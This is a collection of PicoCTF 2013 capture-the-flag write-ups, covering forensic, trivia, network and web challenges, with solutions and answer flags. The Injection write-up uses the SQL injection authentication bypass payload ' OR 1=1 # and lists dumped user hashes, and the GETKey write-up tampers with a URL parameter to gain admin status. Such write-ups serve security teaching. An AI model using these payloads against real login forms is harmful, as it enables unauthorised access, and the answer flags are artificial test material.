8 |
9 |
21 |
22 |
23 |
Welcome to the Secure Login Server.
24 |
Please enter your credentials to proceed
25 |
30 |
31 |
32 |
33 |
34 |
--------------------------------------------------------------------------------
/pico-ctf-2013/core-decryption/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: Core Decryption
2 |
3 | **Category:** Forensic
4 | **Points:** 120
5 | **Description:**
6 |
7 | > In a ruined city on a forgotten world, you find a broken cogitator controlling access to the Vault. You have blueprints for the machine, and a stickynote attached to the monitor with the encrypted input. The machine seems to have crashed while decrypting, and generated a core dump, too. Maybe if you can get the encryption keys out of the core dump, you can decrypt the ciphertext and get the vault open... [Files available for download here](https://2013.picoctf.com/problems/core_decrypt.tar) on on the shell machine in `/problems/core_decrypt.tar`
8 | >
9 | > [Offline file](core_decrypt.tar)
10 |
11 | ## Write-up
12 |
13 | I don't solve this challenge...
14 |
15 | Core Decryption was another one of those painful problems. Though not hard, it's hard to find what direction you need to take. First off, you can't just run GDB with the core file.
16 | You have to compile the cryptor.c with `gcc -m32 -g cryptor.c -o cryptor`, we compile it in 32 bit mode with debugging symbols ON. This is the key to getting the core dump running. Running the core file and binary through GDB with the following commands:
17 |
18 | ```linux
19 | root@neuron:~$ gdb cryptor core.26474
20 | (gdb) bt
21 | #0 0x08048564 in swap (sbox=0xffffd17c "", i=-11652, j=16) at cryptor.c:7
22 | #1 0x08048719 in crypt (inf=0x0, keyf=0xffffd17c, outf=0xf7ffda5c) at cryptor.c:42
23 | #2 0x08048894 in main (argc=4, argv=0xffffd374) at cryptor.c:67
24 | (gdb) f 1
25 | #1 0x08048719 in crypt (inf=0x0, keyf=0xffffd17c, outf=0xf7ffda5c) at cryptor.c:42
26 | 42 tmp ^= next_prg(sbox,&i,&j);
27 | (gdb) info locals
28 | sbox = "\000\001\002\003\004\005\006\a\b\t\n\v\f\r\016\017\020\021\022\023\024\025\026\027\030\031\032\033\034\035\036\037 !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\177\200\201\202\203\204\205\206\207\210\211\212\213\214\215\216\217\220\221\222\223\224\225\226\227\230\231\232\233\234\235\236\237\240\241\242\243\244\245\246\247\250\251\252\253\254\255\256\257\260\261\262\263\264\265\266\267\270\271\272\273\274\275\276\277\300\301\302\303\304\305\306\307\310\311\312\313\314\315\316\317\320\321\322\323\324\325\326\327\330\331\332\333\334\335\336\337\340\341\342\343\344\345\346\347\350\351\352\353\354\355\356\357\360\361\362\363\364\365\366\367\370\371\372\373\374\375\376\377"
29 | i = 0
30 | j = -135168078
31 | key = "\305\344L\004\273/\\\020\272u\033×L\334",
32 | tmp = 247 '\367'
33 | ```
34 |
35 | So we see that there is a key variable here. At first, we wondered what to do with it, what did "incomplete sequence" mean? We decided to ignore it, because if you refer back to the code, you know that the key will be 16 bytes long. We took the key, turned into hex so Python wouldn't have any trouble with it, and we got our result.
36 |
37 | ```python
38 | import random, base64
39 | def crypt(data, key):
40 | x = 0
41 | box = range(256)
42 | for i in range(256):
43 | x = (x + box[i] + ord(key[i % len(key)])) % 256
44 | box[i], box[x] = box[x], box[i]
45 | x = y = 0
46 | out = []
47 | for char in data:
48 | x = (x + 1) % 256
49 | y = (y + box[x]) % 256
50 | box[x], box[y] = box[y], box[x]
51 | out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
52 | return ''.join(out)
53 | with open('ENCRYPTED', 'rb') as f:
54 | content = f.read()
55 | print crypt(content, 'c5e44c04bb2f5c10ba751bc3974cdcdc'.decode('hex'))
56 | ```
57 |
58 | The message, decrypted with RC4, was:
59 |
60 | ```
61 | Well, assuming you're able to actually keep the secret keyfile safe, this is a legitimate way to encrypt files!
62 | Your key is: astronomy_ceremony_times
63 | ```
64 |
65 | **Answer:** astronomy_ceremony_times
66 |
67 | ## Other write-ups and resources
68 |
69 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/core-decryption/core_decrypt.tar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/core-decryption/core_decrypt.tar
--------------------------------------------------------------------------------
/pico-ctf-2013/core-decryption/solve.py:
--------------------------------------------------------------------------------
1 | import random, base64
2 | def crypt(data, key):
3 | x = 0
4 | box = range(256)
5 | for i in range(256):
6 | x = (x + box[i] + ord(key[i % len(key)])) % 256
7 | box[i], box[x] = box[x], box[i]
8 | x = y = 0
9 | out = []
10 | for char in data:
11 | x = (x + 1) % 256
12 | y = (y + box[x]) % 256
13 | box[x], box[y] = box[y], box[x]
14 | out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
15 | return ''.join(out)
16 | with open('ENCRYPTED', 'rb') as f:
17 | content = f.read()
18 | print crypt(content, 'c5e44c04bb2f5c10ba751bc3974cdcdc'.decode('hex'))
--------------------------------------------------------------------------------
/pico-ctf-2013/dark-star/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: Dark Star
2 |
3 | **Category:** Forensic
4 | **Points:** 110
5 | **Description:**
6 |
7 | > Sure are a lot of stars [out there](https://2013.picoctf.com/problems/darkstar.img)... but there's a lot of empty space for things to hide in, too.
8 | >
9 | > The disk image can be found on the shell machines at `/problems/dark_star.img` and the contents of the image are available in `/problems/dark_star/`
10 | >
11 | > [Offline file](darkstar.img)
12 |
13 | ## Write-up
14 |
15 | Use tool [Autopsy](http://www.sleuthkit.org/autopsy/) > Create NewCase and import image file into it.
16 |
17 | 
18 |
19 | ```
20 | Key: Stars hide your fires
21 | ```
22 |
23 | **Answer:** Stars hide your fires
24 |
25 | ## Other write-ups and resources
26 |
27 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/dark-star/darkstar.img:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/dark-star/darkstar.img
--------------------------------------------------------------------------------
/pico-ctf-2013/dark-star/solve.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/dark-star/solve.png
--------------------------------------------------------------------------------
/pico-ctf-2013/ddos-detection/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: DDoS Detection
2 |
3 | **Category:** Forensic
4 | **Points:** 85
5 | **Description:**
6 |
7 | > It appears a SYN-flood style DDoS has been carried out on this system. Send us a list of the IP addresses of the attackers (in any order, separated by spaces), so we can track them down and stop them.
8 | >
9 | > Pcap available to download [here](https://2013.picoctf.com/problems/syn_attack.pcap), or available to analyse online [at CloudShark](http://www.cloudshark.org/captures/88971318a309)
10 | >
11 | > [offline file](syn_attack.pcap)
12 |
13 | ## Write-up
14 |
15 | First, we have to understand what SYN attack is. Simple is attacker send many packet with flag SYN = 1 at a time, server can't respond ACK because timer is longer than sending timer, server is overload.
16 |
17 | Open pcap with `Wireshark > Statics > Conversations`:
18 |
19 | 
20 |
21 | => Server (victim): 128.237.255.81
22 |
23 | Use filter to filt all packets from attack:
24 |
25 | ```
26 | tcp && ip.dst == 128.237.255.81 && tcp.flags.syn == 1 && tcp.flags.ack == 0
27 | ```
28 |
29 | We can lists source IP and it's all IP of attacker.
30 |
31 | `Statics > IP Statics (unchanged filter)`
32 |
33 | **Answer:**
34 |
35 | ```
36 | 121.168.84.32 75.214.206.60 21.241.212.197 55.53.190.191 71.113.17.64 120.130.138.152 171.128.49.99 104.220.68.36 241.210.41.46 33.24.97.48 115.99.66.210 154.29.81.178 69.232.82.51 234.183.31.38 102.146.88.253 196.132.138.81 63.193.172.89 16.6.74.206 94.148.118.202 160.116.210.243 248.237.9.18 161.147.211.153 207.137.67.221 229.61.253.52 180.70.211.154 132.214.137.24 132.42.241.177 65.248.11.247 49.201.237.5 51.145.58.158
37 | ```
38 |
39 | ## Other write-ups and resources
40 |
41 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/ddos-detection/conversations.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/ddos-detection/conversations.png
--------------------------------------------------------------------------------
/pico-ctf-2013/ddos-detection/syn_attack.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/ddos-detection/syn_attack.pcap
--------------------------------------------------------------------------------
/pico-ctf-2013/failure-to-boot/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: Failure To Boot
2 |
3 | **Category:** Trivia
4 | **Points:** 20
5 | **Description:**
6 |
7 | > After opening the robot's front panel and looking inside, you discover a small red button behind a tangle of wires. Pressing the button lights up the robot's primary screen. It glows black and quickly flashes blue. A line of small text types out:
8 | >
9 | > ```ERROR: 0x00000023```
10 | >
11 | > The text refreshes and displays the prompt:
12 | >
13 | > FILE SYSTEM RECOVERY INITIATED...
14 | >
15 | > FILE SYSTEM COULD NOT BE IDENTIFIED...
16 | >
17 | > PLEASE ENTER FILE SYSTEM FORMAT:
18 |
19 | ## Write-up
20 |
21 | Google keyword `ERROR: 0x00000023` for several results.
22 |
23 | And: `STOP 0x00000023 : FAT_FILE_SYSTEM` - a problem with file "Fastfat.sys".
24 |
25 | **Answer:** FAT
26 |
27 | ## Other write-ups and resources
28 |
29 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/first-contact/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: First Contact
2 |
3 | **Category:** Network
4 | **Points:** 40
5 | **Description:**
6 |
7 | > You notice that the indicator light near the robot’s antenna begins to blink. Perhaps the robot is connecting to a network? Using a wireless card and the network protocol analyzer Wireshark, you are able to create a PCAP file containing the packets sent over the network.
8 | >
9 | > You suspect that the robot is communicating with the crashed ship. Your goal is to find the location of the ship by inspecting the network traffic.
10 | >
11 | > You can perform the analysis online on [Cloudshark](http://www.cloudshark.org/captures/bc1c0a7fae2c) or you can download the [PCAP file](https://2013.picoctf.com/problems/first_contact.pcap).
12 | >
13 | > [file offline](first_contact.pcap)
14 |
15 | ## Write-up
16 |
17 | Open file with Wireshark, Select a TCP packet > Follow TCP Stream:
18 |
19 | ```
20 | AWAITING NEW LOCATION STATUS
21 | NEW LOCATION STATUS: 302
22 | NEW LOCATION COORDINATES: 37 14'06"N 115 48'40"W
23 | NEW LOCATION INFO: LOCKED
24 | NEW LOCATION UPDATE COMPLETE
25 | NEW LOCATION UPDATE SUCCESS
26 | ```
27 |
28 | **Answer:** ```37 14'06"N 115 48'40"W```
29 |
30 | ## Other write-ups and resources
31 |
32 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/first-contact/first_contact.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/first-contact/first_contact.pcap
--------------------------------------------------------------------------------
/pico-ctf-2013/getkey/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: GETKey
2 |
3 | **Category:** WebVuln
4 | **Points:** 50
5 | **Description:**
6 |
7 | > There's bound to be a key on the spaceport's [hidden website](https://2013.picoctf.com/problems/getquery/index.php)
8 |
9 | ## Write-up
10 |
11 | HTML code similar:
12 |
13 | ```html
14 |
19 | ```
20 |
21 | We focus on ```method="GET"```, input will be displayed in the URL
22 |
23 | Origin:
24 |
25 | ```
26 | [...]/index.php?admin=false&competition=ccdc
27 | ```
28 |
29 | Solve:
30 |
31 | ```
32 | [...]/index.php?admin=true&competition=picoctf
33 |
34 | FLAG: 9fa449c061d64f58de600dfacaa6bd5d
35 | ```
36 |
37 | **Answer:** 9fa449c061d64f58de600dfacaa6bd5d
38 |
39 | ## Other write-ups and resources
40 |
41 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/getkey/index.php:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
16 |
17 |
18 | FLAG: $key");
26 | } else {
27 | echo("Either you aren't admin or wrong competition");
28 | }
29 | ?>
30 |
35 |
36 |
37 |
--------------------------------------------------------------------------------
/pico-ctf-2013/grep-is-your-friend/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: Grep is Your Friend
2 |
3 | **Category:** Trivia
4 | **Points:** 40
5 | **Description:**
6 |
7 | > After plugging the robot into the computer, the robot asks for the name of a file containing the string `SECRET AUTH CODE`. You can find it using the [command-line interface](https://2013.picoctf.com/webshell) in `/problems/grep.tar` or by downloading [all of the files](https://2013.picoctf.com/problems/grep.tar).
8 | >
9 | > [file offline](grep.tar)
10 |
11 | ## Write-up
12 |
13 | In Linux host, extract rar file, then use `grep` command.
14 |
15 | ```bash
16 | $ tar xzvf grep.tar
17 | $ cd grep
18 | $ strings * | grep "SECRET AUTH CODE"
19 | fHYYpdrfeOCHyQicfe96xfw==: SECRET AUTH CODES
20 | ```
21 |
22 | **Answer:** fHYYpdrfeOCHyQicfe96xfw==
23 |
24 | ## Other write-ups and resources
25 |
26 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/in-hex-no-one-can-hear-you-complain/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: In Hex, No One Can Hear You Complain
2 |
3 | **Category:** Forensic
4 | **Points:** 90
5 | **Description:**
6 |
7 | > While flying through the outskirts of the Ripley system, you notice a distress signal from one of the outer moons. It appears a ship has crash-landed near a 16-sided pyramid. The lone survivor, a [docx file](https://2013.picoctf.com/problems/kane.docx), tells you that a malicious programmer has embedded an egg in his chest and he's afraid that it's going to hatch. He offers his assistance if you can help find the egg.
8 | >
9 | > [Offline file](kane.docx)
10 |
11 | ## Write-up
12 |
13 | First, we need know, the essence of Word file is a normal ZIP file.
14 |
15 | We will extract it. Flag isn't difficult to see: `\word\media\key.png`
16 |
17 | 
18 |
19 | **Answer:** docx_why_not_docz
20 |
21 | ## Other write-ups and resources
22 |
23 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/in-hex-no-one-can-hear-you-complain/kane.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/in-hex-no-one-can-hear-you-complain/kane.docx
--------------------------------------------------------------------------------
/pico-ctf-2013/in-hex-no-one-can-hear-you-complain/key.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/in-hex-no-one-can-hear-you-complain/key.png
--------------------------------------------------------------------------------
/pico-ctf-2013/injection/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: Injection
2 |
3 | **Category:** Web Vuln
4 | **Points:** 110
5 | **Description:**
6 |
7 | > Use the Loading Bay Control System to get the admin key! [Problem](https://2013.picoctf.com/problems/injection/)
8 |
9 | ## Write-up
10 |
11 | The challenge is called "Injection" and it's a web based authentication page. Chances are this is some kind of SQL Injection challenge, and we need to be able to bypass the authentication, as we don’t know a valid username.
12 |
13 | Google for [sql-injection-authentication-bypass-cheat-sheet](https://pentestlab.wordpress.com/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/)
14 |
15 | Trying `' OR 1=1 #` and it's bug:
16 |
17 | ```
18 | Username: user177 Hash: 53e33afe47d6951aa21b90741f11e711
19 |
20 | Username: user178 Hash: 7efdd69b03fbb5cf805419bd1044f558
21 |
22 | Username: admin Hash: bad_code_and_databases_is_no_fun
23 | ```
24 |
25 | **Answer:** bad_code_and_databases_is_no_fun
26 |
27 | ## Other write-ups and resources
28 |
29 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/injection/index.php:
--------------------------------------------------------------------------------
1 |
2 |
3 |